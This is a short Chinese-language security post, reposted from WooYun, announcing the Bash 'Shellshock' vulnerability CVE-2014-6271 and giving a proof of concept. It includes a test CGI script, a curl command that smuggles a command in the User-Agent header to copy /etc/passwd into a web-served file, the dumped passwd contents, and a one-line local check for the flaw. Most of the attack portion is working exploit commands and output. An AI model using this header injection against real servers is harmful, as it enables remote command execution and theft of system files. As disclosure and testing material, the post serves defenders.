转载于:http://zone.wooyun.org/content/15392

from:https://www.invisiblethreat.ca/2014/09/cve-2014-6271/ 

今日Bash爆出远程解析命令执行漏洞(CVE-2014-6271),波及各大Linux发行版与MacOSX系统。漏洞可以直接在Bash支持的Web CGI环境下远程执行任意命令!一些路由器、堡垒机、×××等网络设备也可能会是影响重灾区。目前乌云君已经发现互联网存在的案例,会持续跟进中 http://t.cn/RhjFRmc

收起|查看大图|向左转|向右转

761d2801jw1ekokx1ji9lj20mf0qgadt.jpg


poc.cgi 
#!/bin/bash 
echo "Content-type: text/html" 
echo "" 
echo '<html>' 
echo '<head>' 
echo '<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">' 
echo '<title>PoC</title>' 
echo '</head>' 
echo '<body>' 
echo '<pre>' 
/usr/bin/env 
echo '</pre>' 
echo '</body>' 
echo '</html>' 
exit 0

$ curl -A ‘() { :; }; /bin/cat /etc/passwd > dumped_file’ http://192.168.0.1/poc.cgi 
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> 
<html><head> 
<title>500 Internal Server Error</title> 
</head><body> 
<h1>Internal Server Error</h1> 
<p>The server encountered an internal error or 
misconfiguration and was unable to complete 
your request.</p> 
<p>Please contact the server administrator, 
webmaster@localhost and inform them of the time the error occurred, 
and anything you might have done that may have 
caused the error.</p> 
<p>More information about this error may be available 
in the server error log.</p> 
<hr> 
<address>Apache/2.2.22 (Debian) Server at 192.168.0.1 Port 80</address> 
</body></html>

$ curl http://192.168.0.1/dumped_file 
root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/bin/sh 
bin:x:2:2:bin:/bin:/bin/sh 
sys:x:3:3:sys:/dev:/bin/sh 
sync:x:4:65534:sync:/bin:/bin/sync 
games:x:5:60:games:/usr/games:/bin/sh 
man:x:6:12:man:/var/cache/man:/bin/sh 
lp:x:7:7:lp:/var/spool/lpd:/bin/sh 
mail:x:8:8:mail:/var/mail:/bin/sh 
news:x:9:9:news:/var/spool/news:/bin/sh 
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh 
proxy:x:13:13:proxy:/bin:/bin/sh 
www-data:x:33:33:www-data:/var/www:/bin/sh 
backup:x:34:34:backup:/var/backups:/bin/sh 
list:x:38:38:Mailing List Manager:/var/list:/bin/sh 
irc:x:39:39:ircd:/var/run/ircd:/bin/sh 
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh 
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh 
libuuid:x:100:101::/var/lib/libuuid:/bin/sh 
Debian-exim:x:101:103::/var/spool/exim4:/bin/false 
statd:x:102:65534::/var/lib/nfs:/bin/false 
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin




 env x='() { :;}; echo vulnerable' bash -c "echo this is a test"